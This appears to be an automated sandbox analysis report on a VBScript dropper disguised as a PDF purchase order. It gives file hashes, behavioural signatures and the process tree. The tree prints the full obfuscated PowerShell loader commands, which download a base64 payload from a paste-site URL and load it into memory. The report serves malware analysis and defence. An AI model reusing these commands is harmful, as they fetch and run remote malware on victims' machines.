Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
16-05-2024 17:15
Static task
static1
Behavioral task
behavioral1
Sample
PO_978585_Windshield_&_Escape_Slide.pdf.vbs
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
PO_978585_Windshield_&_Escape_Slide.pdf.vbs
Resource
win10v2004-20240508-en
General
-
Target
PO_978585_Windshield_&_Escape_Slide.pdf.vbs
-
Size
197KB
-
MD5
4730787ad81772f8d9b03ae8faf9efc3
-
SHA1
4d09795bab624a2dbeb62a14870693f8c0dc810c
-
SHA256
c983314c573fe3408730565056c78968b2fdf9dec5d6f67701bcd62eadc39ea4
-
SHA512
d7b28b0377fd0ec04d105a6c3ee3ae92ff98d29b3d8aa1d1c677817fad4b9816126eb4e7e23376d60dd1d263dd0e3ad182732b2e2c8ee0cfa54c64440fdaeaec
-
SSDEEP
384:z1OlYw8nrW9LrBppppppppppppppppppppNGpppppppppppppppppppppppppppf:sfirg/LNA
Malware Config
Extracted
https://pasteio.com/download/xcxWvykfm30a
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 3 2652 powershell.exe 5 2652 powershell.exe 7 2652 powershell.exe -
Processes:
powershell.exepowershell.exepid process 2192 powershell.exe 2652 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2192 powershell.exe 2652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2192 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2984 wrote to memory of 2192 2984 WScript.exe powershell.exe PID 2984 wrote to memory of 2192 2984 WScript.exe powershell.exe PID 2984 wrote to memory of 2192 2984 WScript.exe powershell.exe PID 2192 wrote to memory of 2652 2192 powershell.exe powershell.exe PID 2192 wrote to memory of 2652 2192 powershell.exe powershell.exe PID 2192 wrote to memory of 2652 2192 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO_978585_Windshield_&_Escape_Slide.pdf.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒GI▒cwB4▒GU▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Br▒GU▒bgBx▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HU▒c▒Bk▒Gc▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒c▒Bh▒HM▒d▒Bl▒Gk▒bw▒u▒GM▒bwBt▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒C8▒e▒Bj▒Hg▒VwB2▒Hk▒awBm▒G0▒Mw▒w▒GE▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dQBw▒GQ▒Zw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒MQ▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒ag▒1▒DM▒MQ▒4▒Gk▒SwBX▒C8▒dwBh▒HI▒LwBt▒G8▒Yw▒u▒G4▒aQBi▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒ZQBu▒HE▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bi▒HM▒e▒Bl▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\PO_978585_Windshield_&_Escape_Slide.pdf.vbs');powershell -command $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$pbsxe = '034';$kenqx = 'C:\Users\Admin\AppData\Local\Temp\PO_978585_Windshield_&_Escape_Slide.pdf.vbs';[Byte[]] $nupdg = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xcxWvykfm30a'));[system.AppDomain]::CurrentDomain.Load($nupdg).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('j5318iKW/war/moc.nibetsap//:sptth' , $kenqx , '_______________________-------------', $pbsxe, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56686928b3f569a8eb03c7f5c4300d26f
SHA10e7d60277ab4674072a438ea7c34566d7460c100
SHA25675baecff01326ee0e2356c8cde6e320c5c7ec1a504436e889c2d29ef07775f63
SHA512799d9c4b6a89dcb36870bdbf4843be54a4eb2cc768517441b2b80333258659cf9466a22d89b6103815a9089aedf0af73976dd72bb03072e038d483012a1f54f9